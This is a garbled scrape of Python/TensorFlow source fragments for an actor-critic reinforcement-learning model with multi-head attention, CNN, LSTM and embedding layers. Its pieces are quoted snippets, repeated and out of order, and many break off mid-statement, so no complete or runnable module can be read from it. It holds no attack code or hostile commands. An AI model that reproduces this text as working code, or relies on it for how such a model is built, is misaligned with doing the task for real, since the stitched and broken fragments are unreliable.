super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads", "in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation", "__init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out", "num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth = d_model", "k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len,", "self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q,", "'same' padding so outputs have the same shape as inputs. padding='same') self.activation_layer =", "LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training, mask=None): cl_output", "num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__()", "+= (mask * -1e9) # softmax is normalized on the last axis (seq_len_k)", "axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)", "tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self,", "attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x", "seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class", "= Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last =", "x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10,", "d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size,", "**kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM,", "attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) #", "def call(self, x, z): # Critic value = self.critic(x, z) # Actor actor_output", "k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q,", "self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth", "name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8)", "tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block", "concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention)", "text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim,", "embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation", "def call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z", "mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk", "else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output)", "Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd", "name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model):", "Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units", "tf.math.sqrt(dk) # add the mask to the scaled tensor. if mask is not", "self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads,", "(batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape", "the scaled tensor. if mask is not None: scaled_attention_logits += (mask * -1e9)", "z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1],", "def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def", "self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer =", "seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size)", "= Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split", "-1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k,", "x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x =", "Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk =", "input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in", "import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy", "(batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)", "= Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x, z) #", "BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k,", "**kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units", "from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization,", "= Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 =", "= embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x,", "seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0,", "call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self,", "seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) #", "= d_model assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads", "self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last:", "num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out =", "num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self,", "Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding", "= last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ =", "as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8,", "num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) #", "in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x,", "(batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q,", "class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q,", "LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have", "self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size):", "= tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk =", "the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1,", "actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value", "vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def", "vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock,", "dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask", "def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32,", "tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import", "= LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs", "tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size,", "1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v)", "LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk", "\"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1,", "d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer):", "ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return", "**kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out", "scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\",", "kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size,", "such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x,", "x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output", "text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor =", "num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape ==", "(batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5,", "ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer):", "for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None):", "-1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def", "num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5,", "def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q,", "add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output", "ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)", "depth). Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)", "vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer", "= Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self,", "tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1],", "return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask)", "tensor. if mask is not None: scaled_attention_logits += (mask * -1e9) # softmax", "= in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd')", "= tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std)", "num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output", "= self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10,", "x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3])", "name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer):", "seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)", "import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation,", "self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q,", "self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128,", "Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out", "def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name,", "z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x =", "name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,", "/ tf.math.sqrt(dk) # add the mask to the scaled tensor. if mask is", "self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output)", "seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k =", "= num_heads self.d_model = d_model assert d_model % self.num_heads == 0 self.depth =", "num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output')", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer =", "q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len,", "-1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)", "seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights", "lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies,", "= 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block", "Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units", "same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 =", "= self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output =", "Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer =", "def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) #", "(..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention,", "= self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x", "self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5,", "in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output =", "// self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense =", "num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor,", "LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z)", "# (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) #", "(..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output,", "Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class", "batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the result such that", "= 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs):", "hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic", "d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k,", "(batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q,", "Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6)", "scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2,", "(mask * -1e9) # softmax is normalized on the last axis (seq_len_k) so", "so that the scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)", "self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so", "depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q,", "8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units,", "= tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to", "= Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth).", "attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v,", "= self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]])", "in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1,", "attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False,", "seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention(", "self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q", "have the same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2)", "# (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q =", "32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght)", "self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out,", "num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out)", "= self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x", "scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor.", "= self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model)", "= self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self,", "attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies,", "q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size,", "transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits", "import tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential", "the same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2", "= Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self,", "shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim)", "perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size,", "= embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out", "is normalized on the last axis (seq_len_k) so that the scores # add", "(batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights", "= 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters,", "residual self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output,", "= tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid')", "* -1e9) # softmax is normalized on the last axis (seq_len_k) so that", "= d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model)", "seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0,", "return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "self.d_model = d_model assert d_model % self.num_heads == 0 self.depth = d_model //", "def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output", "v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared", "embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs)", "seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk /", "Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std =", "= self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def", "= self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) #", "kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units))", "in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024,", "tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D,", "self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block =", "x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output", "self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return", "8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding", "d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense", "seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size,", "vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units,", "tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import", "tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled", "attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x", "name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) 